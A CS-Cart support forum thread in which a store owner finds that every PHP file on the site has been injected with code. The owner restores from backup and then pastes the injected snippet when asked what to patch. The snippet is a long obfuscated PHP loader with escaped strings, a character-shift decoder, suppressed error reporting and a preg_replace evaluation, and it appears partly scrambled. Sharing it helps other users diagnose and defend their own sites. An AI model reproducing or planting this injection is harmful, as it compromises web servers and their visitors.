Today I see this error message when trying to log into admin or access the main siteFatal error [color=#000000]: Namespace declaration statement has to be the very first statement in the script in [/color]/home/paracay/public_html/store/app/lib/vendor/composer/ClassLoader.php [color=#000000] on line [/color]13 I have no idea how this happened since it was working fine when I last checked on friday. I looked at this classloader.php file and it looks like a mess of code. Did we possibly get hacked over the weekend? My other sites on the same server are fine, but cs-cart is not working due to this error. Any ideas? I submittied a ticket this morning, but that can take a while to get a response. Thanks
Looks like our site was hacked. I found that every php file had this weird code added to the beginning. I uploaded my backup files and it's fine now. Still kinda weird
can you let usknow what was added so we can know what to patch ?
[quote name='robertparacay' timestamp='1387221545' post='173598']
this is what was added…
j%x5c%x7825!*9!%x5c%x7827!hm60ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#f<%x22%51%x29%51%x29%73", NULL); }825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hWsfuvso!%x5c%x7825bss%x5c%xgps)%x5c%x7825j>1<%x5c%x7825j=6[%xT#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-825-qp%x5c%x7825)54l}%x5c%x78c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x78*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x782f#!%x5c%x78240mqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256
>%x5c%x72f7#@#7%x5c%x782f7^#iubq#45%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%x66%%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x75!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w!>!#]y84]275]y83]248]y83]256]y%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%s!*!+A!>!{e%x5c%x7825)!>%x7825b:>11<%x5c%x7825j:=tj{fpg)77]y72]265]y39]271]y83]256]y78]248]y83]256]y80~:q%x5c%x7825<#762]67y]562]3QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%:*mmvo:>:iuhofm%x5c%x7825:-5ppde<*17-SFEBFI,6<*127-UVPFNJU,6***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*cc%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5c%%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!%50%x2e%52%x29%57%x65","%x65%166%x61%154%x2x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5cdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5cx782f%x5c%x7825kj:-!OVMM*<(<%xc%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x535%165%x3a%146%x21%76%x2L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Lc%x7827id%x5c%x78256<%x5c%sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvc%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nnpd#)tutjyf%x5c%x7860%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c24-%x5c%x7824*#]y3g]6<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssbZ;h!opjudovg}{;#)tutjyf%x5c%x7860opjudo33]65]y31]53]y6d]281]y%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x7pd%x5c%x78256|6.7euR17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R665c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76c%x7825t::!>!%x5c%x7824Ypp3#<%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-t!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]28%151%x6d%160%x6c%157%x64%1>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5c%x78%x7825>j%x5c%x7825!*3!%x5c%x78tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%xc%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x78r%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x71]265]y72]254]y76]61]y33]68]y34]68]yx787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x4}472%x5c%x7824!#]y81]273]y76]258]y6g]273]y782fqp%x5c%x7825>5h%x5c%x7825!n%x5c%x7825<#372]58y]472]3785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%xx5c%x7825V%x5c%x7827{ftmfV%4-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x52:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7 chr(ord($n)-1);} @error_reporting(0); preg_replace("%x2fnpd%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x7825!2EzH,2W%x%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#pjudovg+)!gj+{e%x5c%x7825!osvufvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x782x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]2756g]257]y86]267]y74]275]y7:]268]y7ubfsdXk5%x5c%x7860{66~6<&w6<%782f%x5c%x7825r%x5c%x7878<~!!%x5c]258]y6g]273]y76]271]y7d]252]y74]256#<35]274]y4:]82]y3:]62]y4c#!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-tx787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x782gvodujpo)##-!#~<#%x5c%x782f%x5c%x75c%x7825ww2!>#p#%x5c%x782f#p#%7fmji%x5c%x78786%x5c%x782f7&6|7**111127-K)ebfs#0#)idubn%x5c%x7860hfsq)!sp!*#oj#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7%x5c%x785cq%x5c%x7825%x5c%x7%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c#]y31]278]y3e]81]K78:56985:6197g:74985-) { $GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){returntus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt78]K5]53]Kc#<%x5c%x7825tpz!>!!|!*)323zbek!~!!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860%x5c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%xvr#%x5c%x785cq%x5c%x78257**^#zsf]D:M8]Df#<%x5c%x7825tdz>#L4]275x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c%x7bE{h%x5c%x7825)tpqsut>j%x5c%x7825!*7x5c%x7822#)fepmqyfA>2b%825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hI78Bsfuvso!sboepn)%x5c%x7825epn!Ydrr)%x5c%x7825r%x5c%x78x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^2q%x5c%x7825<#g6R85,67R37,18Rbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!)ftpmdXA6~6j%x5c%x782f#%x5c%x7825#%x5c%x782f#o]c%x7825j:>>1*!%x5c%x782*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~x5c%x787f<*X&Z&S{ftmfV%x5if((function_exists("%x6f%142%x5f%163%x74%141%x72%16152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%c%x7824-!%x5c%x7825%x5c%x782ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y727!hmg%x5c%x7825!)!gj!25w6Z6<.3%x5c%x7860hA%x5c%x76]271]y7d]252]y74]256#!bssbz)%x5c%{66~67<&w6<*&7-#o]s]o]s]#)fep%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88Mx787f!|!*uyfu%x5c%x7827k:!81]265]y72]254]y76#<%x5c%x)!gj!|!*1?hmg%x5c%x7825)!g24gvodujpo!%x5c%x7824-%x5!|!*!***b%x5c%x7825)sf%x5c%x7878pmp;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5cx7824]25%x5c%x7824-%x57825tmw!>!#]y84]275]y83]273]y76]2774") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))27;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%vg)!gj!|!*msv%x5c%x7825)}k~~~1%x5c%x7825s:%x5c%x785c%x5c%x7825j:%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%neb#-*f%x5c%x7825)sf%x5c%#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x56b%x5c%x7825!*##>>X)!gjZ<#opo#>b#O#-#N#*%x5c%x7824%x5c%<2,*j%x5c%x7825!-#1]#-bu7825)fnbozcYufhA%x5c%x78272q4]256]y39]252]y83]273]y72]282#%x5c%x782fh%x5c%x7825:<**c%x7860hA%x5c%x7827pd%x5c%x78258y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opju7y]672]48y]#>s%x5c%x7825<#462]47y]252puft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}mt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!!*#opo#>>}R;msv}.;%x5c%x782fx7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x781]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%c%x785c}X%x5c%x7824!usqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]3~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#:4:|:**#ppde#)tutjyf%x5c%x7860<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5825hOh%x5c%x782f#00#W~!%x!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%xg%x5c%x7825)!gj!~j%x5c%x782x69%164%50%x22%134%x78%62%x#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5z>>2*!%x5c%x7825z>32
e55388
January 6, 2017, 12:00am
6
Today I see this error message when trying to log into admin or access the main site: Namespace declaration statement has to be the very first statement in the script in [b]/home/paracay/public_html/store/app/lib/vendor/composer/ClassLoader.php[/b] on line [b]13[/b]
Replace file ClassLoader.php with the original file